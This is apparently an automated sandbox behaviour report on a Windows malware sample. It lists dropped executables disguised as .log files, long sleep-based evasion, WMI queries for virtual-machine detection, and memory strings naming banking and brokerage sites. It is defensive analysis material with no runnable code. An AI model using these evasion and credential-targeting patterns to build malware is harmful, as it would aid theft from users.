Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bnUEsCJp.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QzpNJrOH.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RRtweJUq.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dpGmOlNk.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oVBKTOiM.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gCMlaExJ.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WJZFAsNx.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JXdofuLG.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\yEUaDqnu.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zsYipEjs.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BqwHRBKU.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tRDbbuYG.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MebxBNFC.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DCGpXXhM.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CEfhBXTR.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fwOdVSPR.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rxJbrpZI.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GidQnkDb.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NsJXliNz.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HjZguhPI.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wHtSiqYz.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AtVzwBvZ.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\fneLqjpL.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QURoIJFv.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wDeIoEvg.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KYTGugDU.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\zOoquaSY.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FkBISkog.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JkPyJTHW.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HAgyIDIK.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RbQwOwnn.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YYEvrLib.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HrJyYQpO.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ksDciByC.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VIjnlGUj.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VWRNVcdg.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ihttcfaK.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BmbzgENi.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NJzXBuON.log	Jump to dropped file
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\lkWuMAXT.log	Jump to dropped file

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23634

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe TID: 1520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6464	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -599719s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -598153s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6784	Thread sleep time: -18000000s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -594188s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -593828s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -593313s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -592688s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -592391s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -592215s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -591953s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -591234s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -590734s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -590375s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -590016s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -589719s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -589297s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -588969s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -588616s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -588422s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -588121s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -587688s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -587341s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -587205s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -587078s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586953s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586844s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586714s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586609s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586500s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6784	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586359s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -586213s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585942s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585813s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585696s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585578s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585469s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585359s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585209s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -585078s >= -30000s	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe TID: 6456	Thread sleep time: -584969s >= -30000s	Jump to behavior

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0100A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0100A69B
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0102B348 FindFirstFileExA,	0_2_0102B348
Source: C:\Users\user\Desktop\9FwQYJSj4N.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0101C220

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

Code function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo,

0_2_0101E6A3

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 599719	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 598153	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 594188	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 593828	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 593313	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592688	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592391	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 592215	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 591953	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 591234	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590734	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590375	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 590016	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 589719	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 589297	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588969	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588616	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588422	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 588121	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587688	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587341	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587205	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 587078	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586953	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586844	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586714	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586609	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586500	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586359	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 586213	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585942	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585813	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585696	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585578	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585469	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585359	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585209	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 585078	Jump to behavior
Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe	Thread delayed: delay time: 584969	Jump to behavior

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\providerBrowserruntimeCrt\Providerbroker.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: 0utajUt79J.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 9FwQYJSj4N.exe, 00000000.00000003.2086069801.0000000000551000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: 0utajUt79J.12.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 0utajUt79J.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3386421486.000000001C031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,116964286o
Source: 0utajUt79J.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wscript.exe, 00000002.00000002.2131801326.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3389041116.000000001C3D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 0utajUt79J.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 0utajUt79J.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 0utajUt79J.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 0utajUt79J.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BSlvAOjamepaXWJMhY.exe, 0000000C.00000002.3386421486.000000001C031000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rs.co.inVMware20,11696428655~
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 0utajUt79J.12.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 0utajUt79J.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 0utajUt79J.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 0utajUt79J.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 0utajUt79J.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wscript.exe, 00000002.00000003.2131139508.0000000002DCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 0utajUt79J.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 0utajUt79J.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 9FwQYJSj4N.exe, BSlvAOjamepaXWJMhY.exe0.5.dr, spoolsv.exe.5.dr, BSlvAOjamepaXWJMhY.exe.5.dr, ApplicationFrameHost.exe.5.dr, BSlvAOjamepaXWJMhY.exe1.5.dr	Binary or memory string: qEmuPae9hmh
Source: 0utajUt79J.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 0utajUt79J.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 0utajUt79J.12.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 0utajUt79J.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 0utajUt79J.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\9FwQYJSj4N.exe

API call chain: ExitProcess graph end node

graph_0-23784

Source: C:\providerBrowserruntimeCrt\Providerbroker.exe

